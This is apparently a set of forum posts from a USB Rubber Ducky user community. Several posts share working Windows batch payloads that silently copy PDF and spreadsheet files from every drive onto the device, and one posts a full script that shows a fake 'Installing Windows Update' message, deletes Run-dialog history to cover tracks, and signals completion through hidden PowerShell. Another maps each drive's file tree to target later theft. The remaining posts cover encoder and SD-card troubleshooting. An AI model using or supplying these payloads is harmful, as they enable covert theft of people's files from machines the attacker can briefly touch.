Cribbit

Does Command & Conquer : Red Alert 2 count as Westwood is part of EA

There are probably a few ways to do this. Code below is untested on a ducky REM Get all drive letters, skips name lable FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO ( REM Check drive is not the ducky IF %%~dA NEQ %~d0 ( REM COPY FILE xcopy /C /Q /G /Y /S %%A\*.pdf %dst% >>nul ) ) or REM Get all drive letters, skips name lable FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO ( REM Check drive is not the ducky IF %%~dA NEQ %~d0 ( REM Call dir on each drive letter find files ending in .pdf or .xlsx FOR /F "delims==" %%I IN ('dir %%A\ /s /b /a-d ^| findstr /ile ".pdf .xlsx"') DO ( REM COPY FILE xcopy /C /Q /G /Y %%I %dst% >>nul ) ) ) Hope this helps

Hi Sinkinson, I don't know if it would be any fast but you could give it a go. Test code: SET maxsize=10485760 FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO ( IF %%~zA LSS %maxsize% ( ECHO %%A is LESS at %%~zA ) ELSE ( ECHO %%A is MORE at %%~zA ) ) Code below untested Too copy file less then 10MB: SET maxsize=10485760 FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO ( IF %%~zA LSS %maxsize% ( xcopy /C /Q /G /Y /S %%A %dst% >>nul ) ) To copy all pdf on the system (but you will most like run in to issue with privileges): SET maxsize=10485760 FOR /R %%I in (*.pdf) do IF %%~zI LSS %maxsize% ( xcopy /C /Q /G /Y /S %%I %dst% >>nul ) Maxsize is in bytes Have not tested in on a duck as my ducky has not got the twin duck firmware on it. so you may need to changes some bit to get it to work Hope this helps

Hi, the copy file code got me thinking when it laid out the file structure. That you could get the ducky to list out and save the the complete file structure and file names. Which could be use later to better target files to copy. I modified the e.cmd with the command: FOR /F %%A IN ('wmic logicaldisk get name') DO IF NOT "%%A" == "Name" (Tree /F /A %%A\ >> %dst%\drivetree.txt)

They have released the notes now: Stealing files with the usb rubber ducky usb exfiltration explained

Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there. e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dislog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2% mkdir %dst% >> nul if Exist %USERPROFILE%\Documents ( REM /C Continues copuing even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted file to destination that does not support encryption. REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file REM /S Copies directories and subdirectories except empty ones. REM /E Copies directories and subdirectories. Including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul ) start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');" I was playing around with the %time% a little so you may want to change them back

You could try running from source in the src/ folder you should have something like Encoder.java from the command line type: javac -g Encoder.java this will generate a class file then type: java Encoder and in should print out the help, then use like the jar (just without the -jar): java Encoder -i input.txt -o inject.bin -l no.properties

Matssol, Also where is your language file resources kept? Java -jar duckencoder.jar -i DucktInputScript.txt -o inject.bin -l resources/no.properties

Hi Matssol, frist check the version of java i had a problem with 1.6 had to install 1.7 see FAQ

Hi, I have a couple of 64MB micro SD card (some have TransFlash written on them) but my ducky does not seem to recognise them, all I get is a red LED on the ducky. Is there a minimum spec of microSD card or a specific format for low capacity SD cards? At the moment they are formatted to FAT with an Allocation unit size 2048 bytes. I know it’s not the payload as have put it on the microSD the duck came with (128MB I think) and a 16GB and both work fine.